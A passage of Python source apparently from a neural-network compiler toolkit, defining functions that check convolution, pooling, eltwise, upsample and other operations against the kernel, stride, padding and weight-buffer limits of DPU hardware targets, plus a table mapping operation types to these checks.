f\"'kernel'({kernels[0]} x {kernels[1]}) is not in DPU supported range({kernel_limit}).\"\n return False, msg\n return True, msg\n\n\ndef check_stride(strides, stride_limit):\n msg = \"\"\n if any([s not in stride_limit for s in stride_limit]):\n msg = f\"'stride'({strides}) is not in DPU supported range({stride_limit}).\"\n return False, msg\n return True, msg\n\ndef check_load_jump_write(ic, channel_parallel, dilation=None):\n msg = \"\"\n dilation = dilation if dilation is not None else [1, 1]\n cp_limit = 256 * channel_parallel\n if ic > cp_limit:\n msg = f\"DPU only supports 'input_channel'({ic}) less than ({cp_limit})\"\n return False, msg\n return True, msg\n\ndef check_save_jump_read(oc, channel_parallel):\n msg = \"\"\n cp_limit = 256 * channel_parallel\n if oc > cp_limit:\n msg = f\"DPU only support 'output_channel'({oc}) less than {cp_limit}\"\n return False, msg\n return True, msg\n\ndef check_pad(pad, kernel):\n msg = \"\"\n if any([p < 0 for p in pad]):\n msg = f\"DPU only support non-negative 'pad'({pad})\"\n return False, msg\n\n if pad[0] > kernel[0]:\n msg = f\"DPU only supports 'pad_left'({pad[0]}) less than 'kernel_width'({kernel[0]})\"\n return False, msg\n \n if pad[1] > kernel[0]:\n msg = f\"DPU only supports 'pad_right'({pad[1]}) less than 'kernel_width'({kernel[0]})\"\n return False, msg\n \n if pad[2] > kernel[1]:\n msg = f\"DPU only supports 'pad_top'({pad[2]}) less than 'kernel_width'({kernel[1]})\"\n return False, msg\n\n if pad[3] > kernel[1]:\n msg = f\"DPU only supports 'pad_bottom'({pad[3]}) less than 'kernel_width'({kernel[1]})\"\n return False, msg\n \n return True, msg\n\ndef check_pad_with_limit(pad, kernel, pad_limit):\n msg = \"\"\n if any([p < 0 for p in pad]):\n msg = f\"DPU only support non-negative 'pad'({pad})\"\n return False, msg\n\n pad_idx_kernel_map = {\n \"pad_left\": [0, 0], # [pad_idx, kernel_idx]\n \"pad_right\": [1, 0],\n \"pad_top\": [2, 1],\n \"pad_bottom\": [3, 1]\n }\n\n\n for key, pad_idx_kernel_idx in pad_idx_kernel_map.items():\n pad_idx, kernel_idx = pad_idx_kernel_idx\n if pad_limit[key]:\n if pad[pad_idx] not in pad_limit[key]:\n msg = f\"{key}({pad[pad_idx]}) is not in range.\"\n return False, msg\n else:\n if pad[pad_idx] > kernel[kernel_idx]:\n msg = f\"DPU only supports {key}({pad[pad_idx]}) less than 'kernel'({kernel[kernel_idx]}).\"\n return False, msg\n \n return True, msg\n\n \ndef check_conv_weights_bank_depth(target, engine, kernel_shape):\n msg = \"\"\n weight_bank_name = engine.weight_bank\n bank_groups = DPUTargetHelper.get_bank_group(target)\n weights_bank = None\n for bank_group in bank_groups:\n if bank_group.name == weight_bank_name:\n weights_bank = bank_group\n break\n\n if weights_bank is None:\n msg = f\"{target.get_name()}'s bank group configure is error, there's no weights bank for the engine.\"\n return False, msg\n\n output_channel_parallel = engine.output_channel_parallel\n k_oc, k_h, k_w, k_ic = kernel_shape\n weight_depth = k_w * k_h * math.ceil(k_ic * 1.0 / weights_bank.bank_width) * math.ceil(output_channel_parallel * 1.0 / weights_bank.bank_num)\n if weight_depth > weights_bank.bank_depth:\n msg = f\"Weights({kernel_shape}) is too large to be loaded into parameter buffer. 'kernel_h * kernel_w * ⌈input_channel / weights_bank_width⌉ * ⌈output_channel_parallel / weights_bank_num⌉({weight_depth})' is supporsed to be less equal than {weights_bank.bank_depth}.\"\n return False, msg\n \n return True, msg\n \ndef check_dwconv_weights_bank_depth(target, engine, kernel_shape):\n msg = \"\"\n weight_bank_name = engine.weight_bank\n bank_groups = target.get_bank_group()\n weights_bank = None\n for bank_group in bank_groups:\n if bank_group.name == weight_bank_name:\n weights_bank = bank_group\n\n if weights_bank is None:\n msg = f\"{target.get_name()}'s bank group configure is error, there's no weights bank for the engine.\"\n return False, msg\n\n channel_parallel = engine.channel_parallel\n k_oc, k_h, k_w, k_ic = kernel_shape\n weight_depth = k_w * k_h * math.ceil(channel_parallel * 1.0 / weights_bank.bank_width)\n if weight_depth > weights_bank.bank_depth:\n msg = f\"Weights({kernel_shape}) is too large to be loaded into parameter buffer. 'kernel_h * kernel_w * input_channel' is supporsed to be less equal than {weights_bank.bank_depth * weights_bank.bank_width}.\"\n return False, msg\n\n return True, msg\n\ndef check_transposed_kernel(kernel, stride, limit):\n msg = \"\"\n if not (kernel // stride in limit and (kernel % stride == 0 or (kernel // stride + 1) in limit)):\n msg = f\"'kernel / stride'({kernel} / {stride}) is not in DPU supported range{limit}.\"\n return False, msg\n return True, msg\n\ndef check_pool_engine(target):\n msg = \"\"\n if not (DPUTargetHelper.has_pool_engine(target) or DPUTargetHelper.has_alu_engine(target)):\n msg = f\"{DPUTargetHelper.get_name(target)} does not have pool-engine.\"\n return False, msg\n return True, msg\n\ndef check_dwconv_engine(target):\n msg = \"\"\n if not (DPUTargetHelper.has_dwconv_engine(target) or DPUTargetHelper.has_alu_engine(target)):\n msg = f\"{DPUTargetHelper.get_name(target)} does not have depthwise-conv-engine.\"\n return False, msg\n return True, msg\n\ndef check_eltwise_engine(target):\n msg = \"\"\n if not DPUTargetHelper.has_eltwise_engine(target):\n msg = f\"{DPUTargetHelper.get_name(target)} does not have eltwise-engine\"\n return False, msg\n return True, msg\n\n\n\ndef filter_conv2d(node, target):\n msg = \"\"\n ksize = node.node_attr(node.op.AttrName.KERNEL)\n strides = node.node_attr(node.op.AttrName.STRIDE)\n dilation = node.node_attr(node.op.AttrName.DILATION)\n padding = node.node_attr(node.op.AttrName.PAD)\n\n conv_engine = DPUTargetHelper.get_conv_engine(target)\n channel_parallel = conv_engine.input_channel_parallel\n ic = node.in_tensors[0].shape[3]\n oc = node.out_tensors[0].shape[3]\n dilated_ksize = list(ksize)\n for i in range(len(dilated_ksize)):\n dilated_ksize[i] = (ksize[i] - 1) * dilation[i] + 1\n \n kernel_limit = DPUTargetHelper.parse_range(\"1-16\")\n\n if DPUTargetHelper.has_attr(conv_engine, \"conv_limit\") and conv_engine.conv_limit.kernel_size:\n kernel_limit = DPUTargetHelper.parse_range(conv_engine.conv_limit.kernel_size)\n \n ret, msg = check_kernel(ksize, kernel_limit)\n\n if not ret:\n return ret, msg\n \n ret, msg = check_conv_weights_bank_depth(target, conv_engine, node.op.get_param(node.op.ParamName.WEIGHTS).shape)\n\n if not ret:\n return ret, msg\n \n stride_limit = DPUTargetHelper.parse_range(\"1-4\")\n if DPUTargetHelper.has_attr(conv_engine, \"conv_limit\") and conv_engine.conv_limit.stride:\n stride_limit = DPUTargetHelper.parse_range(conv_engine.conv_limit.stride)\n\n iw = node.in_tensors[0].shape[2]\n ih = node.in_tensors[0].shape[1]\n\n if iw != ksize[0] or ih != ksize[1]:\n ret, msg = check_stride(strides, stride_limit)\n \n if not ret:\n return ret, msg\n\n ret, msg = check_load_jump_write(ic, channel_parallel, dilation)\n\n if not ret:\n return ret, msg\n \n ret, msg = check_pad(padding, dilated_ksize)\n\n if not ret:\n return ret, msg\n\n # ret, msg = check_nonlinear(conv_engine, node)\n\n # if not ret:\n # return ret, msg\n\n return True, msg\n\n\n\n\ndef filter_depthwise_conv2d(node, target):\n msg = \"\"\n ret, msg = check_dwconv_engine(target)\n if not ret:\n return ret, msg\n ksize = node.node_attr(node.op.AttrName.KERNEL)\n strides = node.node_attr(node.op.AttrName.STRIDE)\n dilation = node.node_attr(node.op.AttrName.DILATION)\n padding = node.node_attr(node.op.AttrName.PAD)\n ic = node.in_tensors[0].shape[3]\n oc = node.out_tensors[0].shape[3]\n dilated_ksize = list(ksize)\n for i in range(len(dilated_ksize)):\n dilated_ksize[i] = (ksize[i] - 1) * dilation[i] + 1\n \n kernel_limit = DPUTargetHelper.parse_range(\"1-16\")\n stride_limit = DPUTargetHelper.parse_range(\"1-4\")\n pad_limit = {}\n if DPUTargetHelper.has_alu_engine(target):\n alu_engine = DPUTargetHelper.get_alu_engine(target)\n channel_parallel = alu_engine.channel_parallel\n if DPUTargetHelper.has_attr(alu_engine, \"alu_limit\"):\n alu_limit = alu_engine.alu_limit\n if alu_limit.kernel_size:\n kernel_limit = DPUTargetHelper.parse_range(alu_limit.kernel_size)\n if alu_limit.stride:\n stride_limit = DPUTargetHelper.parse_range(alu_limit.stride)\n\n if DPUTargetHelper.has_attr(alu_engine, \"pad_limit\"):\n alu_pad_limit = alu_engine.pad_limit\n if alu_pad_limit.pad_left:\n pad_limit[\"pad_left\"] = DPUTargetHelper.parse_range(alu_pad_limit.pad_left)\n if alu_pad_limit.pad_right:\n pad_limit[\"pad_right\"] = DPUTargetHelper.parse_range(alu_pad_limit.pad_right)\n \n if alu_pad_limit.pad_top:\n pad_limit[\"pad_top\"] = DPUTargetHelper.parse_range(alu_pad_limit.pad_top)\n\n if alu_pad_limit.pad_bottom:\n pad_limit[\"pad_bottom\"] = DPUTargetHelper.parse_range(alu_pad_limit.pad_bottom)\n else:\n dwconv_engine = DPUTargetHelper.get_dwconv_engine(target)\n channel_parallel = dwconv_engine.channel_parallel\n if DPUTargetHelper.has_attr(dwconv_engine, \"dwconv_limit\"):\n dwconv_limit = dwconv_engine.dwconv_limit\n if dwconv_limit.kernel_size:\n kernel_limit = DPUTargetHelper.parse_range(dwconv_limit.kernel_size)\n if dwconv_limit.stride:\n stride_limit = DPUTargetHelper.parse_range(dwconv_limit.stride)\n \n if DPUTargetHelper.get_type(target) == \"DPUCAHX8H\":\n if strides[0] > ksize[0]:\n msg = f\"The stride_w({strides[0]}) > kernel_w({ksize[0]}), but {DPUTargetHelper.get_name(target)} only support stride_w <= kernel_w.\"\n return False, msg\n\n ret, msg = check_kernel(ksize, kernel_limit)\n if not ret:\n return ret, msg\n \n iw = node.in_tensors[0].shape[2]\n ih = node.in_tensors[0].shape[1]\n\n if not(iw == ksize[0] and ih == ksize[1]):\n ret, msg = check_stride(strides, stride_limit)\n if not ret:\n return ret, msg\n ret, msg = check_load_jump_write(ic, channel_parallel, dilation)\n if not ret:\n return ret, msg\n \n ret, msg = check_save_jump_read(oc, channel_parallel)\n if not ret:\n return ret, msg\n\n if DPUTargetHelper.has_alu_engine(target):\n ret, msg = check_dwconv_weights_bank_depth(target, DPUTargetHelper.get_alu_engine(target), node.op.get_param(node.op.ParamName.WEIGHTS).shape)\n if not ret:\n return ret, msg\n else:\n ret, msg = check_dwconv_weights_bank_depth(target, DPUTargetHelper.get_dwconv_engine(target), node.op.get_param(node.op.ParamName.WEIGHTS).shape)\n if not ret:\n return ret, msg\n\n if pad_limit:\n ret, msg = check_pad_with_limit(padding, dilated_ksize, pad_limit)\n if not ret:\n return ret, msg\n else:\n ret, msg = check_pad(padding, dilated_ksize)\n if not ret:\n return ret, msg\n\n # if DPUTargetHelper.has_alu_engine(target):\n # ret, msg = check_nonlinear(DPUTargetHelper.get_alu_engine(target), node)\n # if not ret:\n # return ret, msg\n # else:\n # ret, msg = check_nonlinear(DPUTargetHelper.get_dwconv_engine(target), node)\n # if not ret:\n # return ret, msg\n return True, msg\n\ndef filter_transpose_conv2d(node, target):\n msg = \"\"\n ksize = node.node_attr(node.op.AttrName.KERNEL)\n strides = node.node_attr(node.op.AttrName.STRIDE)\n dilation = node.node_attr(node.op.AttrName.DILATION)\n padding = node.node_attr(node.op.AttrName.PAD)\n\n output_padding = node.node_config(\"output_padding\")\n if any([pad != 0 for pad in output_padding]):\n msg = \"DPU does not support output_padding.\"\n return False, msg\n\n conv_engine = DPUTargetHelper.get_conv_engine(target)\n channel_parallel = conv_engine.input_channel_parallel\n\n ic = node.in_tensors[0].shape[3]\n oc = node.out_tensors[0].shape[3]\n\n kernel_limit = DPUTargetHelper.parse_range(\"1-16\")\n if DPUTargetHelper.has_attr(conv_engine, \"conv_limit\") and conv_engine.conv_limit.kernel_size:\n kernel_limit = DPUTargetHelper.parse_range(conv_engine.conv_limit.kernel_size)\n\n ret, msg = check_transposed_kernel(ksize[0], strides[0], kernel_limit)\n if not ret:\n return ret, msg\n ret, msg = check_transposed_kernel(ksize[1], strides[1], kernel_limit)\n if not ret:\n return ret, msg\n\n ret, msg = check_conv_weights_bank_depth(target, conv_engine, node.op.get_param(node.op.ParamName.WEIGHTS).shape)\n\n if not ret:\n return ret, msg\n\n ret, msg = check_load_jump_write(ic, channel_parallel, dilation)\n if not ret:\n return ret, msg\n\n ret, msg = check_save_jump_read(oc, channel_parallel)\n if not ret:\n return ret, msg\n\n ret, msg = check_pad(padding, ksize)\n if not ret:\n return ret, msg\n\n # ret, msg = check_nonlinear(conv_engine, node)\n # if not ret:\n # return ret, msg\n\n return True, msg\n\n\ndef filter_transpose_depthwise_conv2d(node, target):\n msg = \"\"\n ret, msg = check_dwconv_engine(target)\n if not ret:\n return ret, msg\n ksize = node.node_attr(node.op.AttrName.KERNEL)\n strides = node.node_attr(node.op.AttrName.STRIDE)\n padding = node.node_attr(node.op.AttrName.PAD)\n dilation = node.node_attr(node.op.AttrName.DILATION)\n ic = node.in_tensors[0].shape[3]\n oc = node.out_tensors[0].shape[3]\n\n output_padding = node.node_config(\"output_padding\")\n if any([pad != 0 for pad in output_padding]):\n msg = \"DPU does not support output_padding.\"\n return False, msg\n \n kernel_limit = DPUTargetHelper.parse_range(\"1-16\")\n stride_limit = DPUTargetHelper.parse_range(\"1-4\")\n pad_limit = {}\n if DPUTargetHelper.has_alu_engine(target):\n alu_engine = DPUTargetHelper.get_alu_engine(target)\n channel_parallel = alu_engine.channel_parallel\n if DPUTargetHelper.has_attr(alu_engine, \"alu_limit\"):\n alu_limit = alu_engine.alu_limit\n if alu_limit.kernel_size:\n kernel_limit = DPUTargetHelper.parse_range(alu_limit.kernel_size)\n if alu_limit.stride:\n stride_limit = DPUTargetHelper.parse_range(alu_limit.stride)\n\n if DPUTargetHelper.has_attr(alu_engine, \"pad_limit\"):\n alu_pad_limit = alu_engine.pad_limit\n if alu_pad_limit.pad_left:\n pad_limit[\"pad_left\"] = DPUTargetHelper.parse_range(alu_pad_limit.pad_left)\n if alu_pad_limit.pad_right:\n pad_limit[\"pad_right\"] = DPUTargetHelper.parse_range(alu_pad_limit.pad_right)\n \n if alu_pad_limit.pad_top:\n pad_limit[\"pad_top\"] = DPUTargetHelper.parse_range(alu_pad_limit.pad_top)\n\n if alu_pad_limit.pad_bottom:\n pad_limit[\"pad_bottom\"] = DPUTargetHelper.parse_range(alu_pad_limit.pad_bottom)\n else:\n dwconv_engine = DPUTargetHelper.get_dwconv_engine(target)\n channel_parallel = dwconv_engine.channel_parallel\n if DPUTargetHelper.has_attr(dwconv_engine, \"dwconv_limit\"):\n dwconv_limit = dwconv_engine.dwconv_limit\n if dwconv_limit.kernel_size:\n kernel_limit = DPUTargetHelper.parse_range(dwconv_limit.kernel_size)\n if dwconv_limit.stride:\n stride_limit = DPUTargetHelper.parse_range(dwconv_limit.stride)\n ret, msg = check_transposed_kernel(ksize[0], strides[0], kernel_limit)\n if not ret:\n return ret, msg\n \n ret, msg = check_transposed_kernel(ksize[1], strides[1], kernel_limit)\n if not ret:\n return ret, msg\n ret, msg = check_stride([1, 1], stride_limit)\n if not ret:\n return ret, msg\n\n ret, msg = check_load_jump_write(ic, channel_parallel, dilation)\n if not ret:\n return ret, msg\n\n ret, msg = check_save_jump_read(oc, channel_parallel)\n\n if pad_limit:\n ret, msg = check_pad_with_limit(padding, ksize, pad_limit)\n if not ret:\n return ret, msg\n else:\n ret, msg = check_pad(padding, ksize)\n if not ret:\n return ret, msg\n\n # if DPUTargetHelper.has_alu_engine(target):\n # ret, msg = check_nonlinear(DPUTargetHelper.get_alu_engine(target), node)\n # if not ret:\n # return ret, msg\n # else:\n # ret, msg = check_nonlinear(DPUTargetHelper.get_dwconv_engine(target), node)\n # if not ret:\n # return ret, msg \n return True, msg\n\ndef filter_conv3d(node, target):\n msg = \"\"\n if DPUTargetHelper.get_type(target) != \"DPUCVDX8G\":\n msg = f\"{DPUTargetHelper.get_name(target)} does not support {node.op.type}. Only DPUCVDX8G support this.\"\n return False, msg\n return True, msg\n\ndef filter_depthwise_conv3d(node, target):\n msg = \"\"\n if DPUTargetHelper.get_type(target) != \"DPUCVDX8G\":\n msg = f\"{DPUTargetHelper.get_name(target)} does not support {node.op.type}. Only DPUCVDX8G support this.\"\n return False, msg\n return True, msg\n\n\ndef filter_transpose_conv3d(node, target):\n msg = \"\"\n if DPUTargetHelper.get_type(target) != \"DPUCVDX8G\":\n msg = f\"{DPUTargetHelper.get_name(target)} does not support {node.op.type}. Only DPUCVDX8G support this.\"\n return False, msg\n\n output_padding = node.node_config(\"output_padding\")\n if any([pad != 0 for pad in output_padding]):\n msg = \"DPU does not support output_padding.\"\n return False, msg\n\n return True, msg\n\n\ndef filter_transpose_depthwise_conv3d(node, target):\n msg = \"\"\n if DPUTargetHelper.get_type(target) != \"DPUCVDX8G\":\n msg = f\"{DPUTargetHelper.get_name(target)} does not support {node.op.type}. Only DPUCVDX8G support this.\"\n return False, msg\n \n output_padding = node.node_config(\"output_padding\")\n if any([pad != 0 for pad in output_padding]):\n msg = \"DPU does not support output_padding.\"\n return False, msg\n \n return True, msg\n\n\n\ndef filter_pool(node, target):\n msg = \"\"\n ret, msg = check_pool_engine(target)\n if not ret:\n return ret, msg\n\n avg_pool_type = [NNDCT_OP.AVG_POOL, NNDCT_OP.ADAPTIVEAVGPOOL2D]\n max_pool_type = [NNDCT_OP.MAX_POOL]\n\n ksize = node.node_attr(node.op.AttrName.KERNEL)\n strides = node.node_attr(node.op.AttrName.STRIDE)\n padding = node.node_attr(node.op.AttrName.PAD)\n\n if DPUTargetHelper.has_alu_engine(target):\n alu_engine = DPUTargetHelper.get_alu_engine(target)\n support_list = alu_engine.alu_type\n has_max = any([t == alu_engine.max_pool for t in support_list])\n has_avg = any([t == alu_engine.avg_pool for t in support_list])\n has_max_reduce = any([t == alu_engine.max_reduce for t in support_list])\n else:\n pool_engine = DPUTargetHelper.get_pool_engine(target)\n support_list = pool_engine.pool_type\n has_max = any([t == pool_engine.max for t in support_list])\n has_avg = any([t == pool_engine.avg for t in support_list])\n has_max_reduce = any([t == pool_engine.max_reduce for t in support_list])\n\n if not ((node.op.type in max_pool_type and (has_max or has_max_reduce)) or (node.op.type in avg_pool_type and has_avg)):\n msg = f\"{DPUTargetHelper.get_name(target)} does not support {node.op.type}.\"\n return False, msg\n \n kernel_limit = DPUTargetHelper.parse_range(\"1-8\")\n stride_limit = DPUTargetHelper.parse_range(\"1-8\")\n pad_limit = {}\n if DPUTargetHelper.has_alu_engine(target):\n alu_engine = DPUTargetHelper.get_alu_engine(target)\n if DPUTargetHelper.has_attr(alu_engine, \"alu_limit\"):\n alu_limit = alu_engine.alu_limit\n if alu_limit.kernel_size:\n kernel_limit = DPUTargetHelper.parse_range(alu_limit.kernel_size)\n if alu_limit.stride:\n stride_limit = DPUTargetHelper.parse_range(alu_limit.stride)\n\n if DPUTargetHelper.has_attr(alu_engine, \"pad_limit\"):\n alu_pad_limit = alu_engine.pad_limit\n if alu_pad_limit.pad_left:\n pad_limit[\"pad_left\"] = DPUTargetHelper.parse_range(alu_pad_limit.pad_left)\n if alu_pad_limit.pad_right:\n pad_limit[\"pad_right\"] = DPUTargetHelper.parse_range(alu_pad_limit.pad_right)\n if alu_pad_limit.pad_top:\n pad_limit[\"pad_top\"] = DPUTargetHelper.parse_range(alu_pad_limit.pad_top)\n if alu_pad_limit.pad_bottom:\n pad_limit[\"pad_bottom\"] = DPUTargetHelper.parse_range(alu_pad_limit.pad_bottom)\n elif node.op.type in avg_pool_type:\n if ksize[0] != ksize[1]:\n msg = f\"DPU only supports avgpool with square kernel, but this op has kernel {ksize[0]} x {ksize[1]}.\"\n return False, msg\n\n pool_engine = DPUTargetHelper.get_pool_engine(target)\n if DPUTargetHelper.has_attr(pool_engine, \"avg_limit\"):\n avg_limit = pool_engine.avg_limit\n if avg_limit.kernel_size:\n kernel_limit = DPUTargetHelper.parse_range(avg_limit.kernel_size)\n if avg_limit.stride:\n stride_limit = DPUTargetHelper.parse_range(avg_limit.stride)\n elif node.op.type in max_pool_type:\n pool_engine = DPUTargetHelper.get_pool_engine(target)\n if DPUTargetHelper.has_attr(pool_engine, \"max_limit\"):\n max_limit = pool_engine.max_limit\n if max_limit.kernel_size:\n kernel_limit = DPUTargetHelper.parse_range(max_limit.kernel_size)\n if max_limit.stride:\n stride_limit = DPUTargetHelper.parse_range(max_limit.stride)\n \n if node.op.type in max_pool_type and has_max_reduce and ksize[0] not in kernel_limit:\n if ksize[0] > 100:\n msg = f\"'kernel_width'({ksize[0]}) is not in DPU supported range [1, 100]\"\n return False, msg\n if ksize[1] < 1 or ksizse[1] > 2:\n msg = f\"'kernel_height'({ksize[1]}) is not in DPU supported range [1, 2]\"\n return False, msg\n else:\n ret, msg = check_kernel(ksize, kernel_limit)\n if not ret:\n return ret, msg\n iw = node.in_tensors[0].shape[2]\n ih = node.in_tensors[0].shape[1]\n if iw != ksize[0] or ih != ksize[1]:\n ret, msg = check_stride(strides, stride_limit)\n if not ret:\n return ret, msg\n \n if pad_limit:\n ret, msg = check_pad_with_limit(padding, ksize, pad_limit)\n if not ret:\n return ret, msg\n else:\n ret, msg = check_pad(padding, ksize)\n if not ret:\n return ret, msg\n return True, msg\n\n\ndef filter_eltwise(node, target):\n msg = \"\"\n if node.op.type == NNDCT_OP.MULTIPLY and node.in_tensors[1].node.op.type in [NNDCT_OP.CONST, NNDCT_OP.TENSOR]:\n prefix_msg = \"Try to convert mul to DepthwiseConv2d failed.\"\n ret, check_msg = check_dim_of_inputs_of_mul(node)\n if not ret:\n msg = prefix_msg + check_msg\n else: \n dwconv2d = create_dwconv2d_from_mul(node)\n mul_op = node.op\n node.op = dwconv2d\n input_tensor = node.in_tensors[0] \n out_tensor = node.out_tensors[0]\n old_shape = input_tensor.shape\n new_shape = list(old_shape)\n for i in range(4 - len(old_shape)):\n new_shape.insert(0, 1)\n input_tensor.shape = new_shape\n out_tensor.shape = new_shape\n ret, check_msg = filter_depthwise_conv2d(node, target)\n node.op = mul_op\n input_tensor.shape = old_shape\n out_tensor.shape = old_shape\n if not ret:\n msg = prefix_msg + check_msg\n else:\n return True, msg\n \n ret, check_msg = check_eltwise_engine(target)\n if not ret:\n return ret, msg + check_msg\n eltwise_engine = DPUTargetHelper.get_eltwise_engine(target)\n support_list = eltwise_engine.elew_type\n if node.op.type == NNDCT_OP.ADD:\n has_add = any([t == eltwise_engine.add for t in support_list])\n if not has_add:\n msg = f\"{DPUTargetHelper.get_name(target)} does not support eltwise ADD.\"\n return False, msg\n elif node.op.type == NNDCT_OP.MULTIPLY:\n has_mul = any([t == eltwise_engine.mult for t in support_list])\n if not has_mul:\n msg += f\"{DPUTargetHelper.get_name(target)} does not support eltwise MUL.\"\n return False, msg\n else:\n msg = f\"{DPUTargetHelper.get_name(target)} does not support {node.op.type}.\" \n return False, msg\n \n return True, msg\n\ndef filter_concat(node, target):\n ret = True\n msg = \"\"\n if any([not pn.target_device or pn.target_device.get_device_type() == DeviceType.CPU for pn in node.owning_graph.parents(node)]):\n msg += \"The input of concat is not in DPU subgraph.\"\n dimension = node.out_tensors[0].ndim\n if dimension != 4:\n msg += \"And output dimension is not 4.\"\n ret = False\n else:\n if node.node_attr(node.op.AttrName.AXIS) != 3:\n msg += \"And it's not a channel-wise concatenation.\"\n ret = False\n\n if DPUTargetHelper.get_name(target) == \"DPUCADF8H\":\n dimension = node.out_tensors[0].ndim\n if dimension != 4:\n msg += \"Output dimension is not 4.\"\n ret = False\n else:\n if node.node_attr(node.op.AttrName.AXIS) != 3:\n msg += \"It's not a channel-wise concatenation.\"\n ret = False\n\n return ret, msg\n\n\n\n\ndef filter_upsample(node, target):\n msg = \"\"\n if node.node_attr(node.op.AttrName.MODE) == \"BILINEAR\":\n prefix_msg = \"Try to convert BlinearUpsamle2d to transpose depthwise conv2d failed.\"\n ret, check_msg = check_bilinear_upsample_scale(node)\n if not ret:\n msg = prefix_msg + check_msg\n else:\n transpose_dwconv2d = create_transpose_dwconv2d_from_bilinear_upsample(node)\n upsample = node.op\n node.op = transpose_dwconv2d\n ret, check_msg = filter_transpose_depthwise_conv2d(node, target)\n node.op = upsample\n if not ret:\n msg = prefix_msg + check_msg\n else:\n return True, msg\n \n align_corners = node.node_attr(node.op.AttrName.ALIGN_CORNERS)\n if align_corners:\n msg = \"DPU does not support align_corners = True\"\n return False, msg\n\n mode = node.node_attr(node.op.AttrName.MODE)\n if mode == \"BILINEAR\":\n msg += f\"DPU does not support {mode} mode.(only support NEAREST mode).\"\n return ret, msg \n load_engine = DPUTargetHelper.get_load_engine(target)\n channel_parallel = load_engine.channel_parallel\n ic = node.in_tensors[0].shape[3]\n ret, msg = check_load_jump_write(ic, channel_parallel)\n if not ret:\n return ret, msg\n return True, msg\n\ndef filter_reshape(node, target):\n msg = \"\"\n if DPUTargetHelper.get_type(target) == \"DPUCADF8H\":\n return False, msg\n \n input_node = node.owning_graph.parents(node)[0]\n if not (input_node.target_device and input_node.target_device.get_device_type() == DeviceType.DPU):\n return False, msg\n \n return True, msg\n \n\n\ndef filter_pad(node, target):\n msg = \"\"\n mode = node.node_attr(node.op.AttrName.MODE)\n if mode not in [0, 2]: #DPU only support CONSTANT / SYMMETRIC mode\n msg = f\"DPU only support CONSTANT or SYMMETRIC mode.\"\n return False, msg\n \n load_engine = DPUTargetHelper.get_load_engine(target)\n channel_parallel = load_engine.channel_parallel\n ic = node.in_tensors[0].shape[3]\n ret, msg = check_load_jump_write(ic, channel_parallel)\n if not ret:\n return ret, msg\n\n return True, msg\n\ndef filter_hard_sigmoid(node, target):\n msg = \"\"\n if not DPUTargetHelper.has_alu_engine(target):\n msg = \"This target does not support single hard-sigmoid.\"\n return False, msg\n return True, msg\n\n\ndef filter_leaky_relu(node, target):\n msg = \"\"\n alpha = node.node_attr(node.op.AttrName.ALPHA)\n dpu_alpha = 26.0 / 256\n if alpha != dpu_alpha:\n msg = f\"Its alpa is {alpha}, but DPU only support {dpu_alpha}.\"\n return False, msg\n return True, msg\n\n\nfilters = {\n NNDCT_OP.AVG_POOL: filter_pool,\n NNDCT_OP.ADAPTIVEAVGPOOL2D: filter_pool,\n NNDCT_OP.CONVTRANSPOSE2D: filter_transpose_conv2d,\n NNDCT_OP.CONV2D: filter_conv2d,\n # NNDCT_OP.CONCAT: filter_concat, # relax\n NNDCT_OP.DEPTHWISE_CONV2D: filter_depthwise_conv2d,\n NNDCT_OP.ADD: filter_eltwise,\n NNDCT_OP.MULTIPLY: filter_eltwise,\n NNDCT_OP.MAX_POOL: filter_pool,\n NNDCT_OP.PAD: filter_pad,\n NNDCT_OP.CONV3D: filter_conv3d,\n NNDCT_OP.DEPTHWISE_CONV3D: filter_depthwise_conv3d,\n\n NNDCT_OP.RESIZE: filter_upsample,\n # NNDCT_OP.RESIZE_3D: filter_upsample, # relax\n NNDCT_OP.CONVTRANSPOSE3D: filter_transpose_conv3d,\n NNDCT_OP.HSIGMOID: filter_hard_sigmoid,\n NNDCT_OP.HSWISH: filter_hard_sigmoid,\n NNDCT_OP.DEPTHWISE_CONVTRANSPOSE2D: filter_transpose_depthwise_conv2d,\n NNDCT_OP.DEPTHWISE_CONVTRANSPOSE3D: filter_transpose_depthwise_conv3d,\n NNDCT_OP.LEAKY_RELU: filter_leaky_relu\n # append here\n\n}\n\n\ndef merge_permute_to_matmul(graph, target):\n def handler(*args, **kwargs):\n _, node_set = args\n permute_node = node_set[0]\n dense_node = node_set[-1]\n if permute_node.target_device and permute_node.target_device.get_device_type() == DeviceType.DPU:\n return\n if permute_node.node_attr(permute_node.op.AttrName.ORDER) == [0, 3, 1, 2] and dense_node.target_device:\n permute_node.target_device = DeviceInfo(dense_node.target_device.get_device_type())\n permute_node.target_device.clear_filter_message()\n\n graph_searcher = GraphSearcher(graph)\n _ = graph_searcher.find_nodes_from_type(\n [PatternType(pattern=[NNDCT_OP.PERMUTE, NNDCT_OP.FLATTEN, NNDCT_OP.DENSE],\n action=handler), \n PatternType(pattern=[NNDCT_OP.PERMUTE, NNDCT_OP.RESHAPE, NNDCT_OP.DENSE], \n action=handler),\n ])\n \ndef filter_dpu_interface_concat(graph, target):\n def handler(*args, **kwargs):\n _, node_set = args\n concat = node_set[0]\n if concat.target_device and concat.target_device.get_device_type() == DeviceType.DPU:\n return\n ret, msg = filter_concat(concat, target)\n if ret:\n concat.target_device = DeviceInfo(DeviceType.DPU)\n concat.target_device.clear_filter_message()\n else:\n concat.target_device = DeviceInfo(DeviceType.CPU)\n concat.target_device.set_filter_message(msg)\n\n graph_searcher = GraphSearcher(graph)\n _ = graph_searcher.find_nodes_from_type(\n [PatternType(pattern=[NNDCT_OP.CONCAT],\n action=handler)])\n\ndef filter_dpu_interface_reshape(graph, target):\n def handler(*args, **kwargs):\n _, node_set = args\n reshape = node_set[0]\n if not (reshape.target_device and reshape.target_device.get_device_type() == DeviceType.DPU):\n return\n input_node = reshape.owning_graph.parents(reshape)[0]\n if input_node.target_device and input_node.target_device.get_device_type() == DeviceType.DPU \\\n and all([cn.target_device and cn.target_device.get_device_type() == DeviceType.DPU for cn in reshape.owning_graph.children(reshape)]):\n # an internal reshape, do nothing\n pass\n else:\n if input_node.out_tensors[0].shape[0] != reshape.out_tensors[0].shape[0]:\n msg = \"First dimension is changed.\"\n reshape.target_device = DeviceInfo(DeviceType.CPU)\n reshape.target_device.set_filter_message(msg)\n\n graph_searcher = GraphSearcher(graph)\n _ = graph_searcher.find_nodes_from_type(\n [PatternType(pattern=[NNDCT_OP.RESHAPE],\n action=handler),\n PatternType(pattern=[NNDCT_OP.FLATTEN],\n action=handler),\n ])\n \ndef check_dim_of_inputs_of_mul(node):\n msg = \"\"\n if_replaceabel = True\n input_shape = node.in_tensors[0].shape\n const_node = 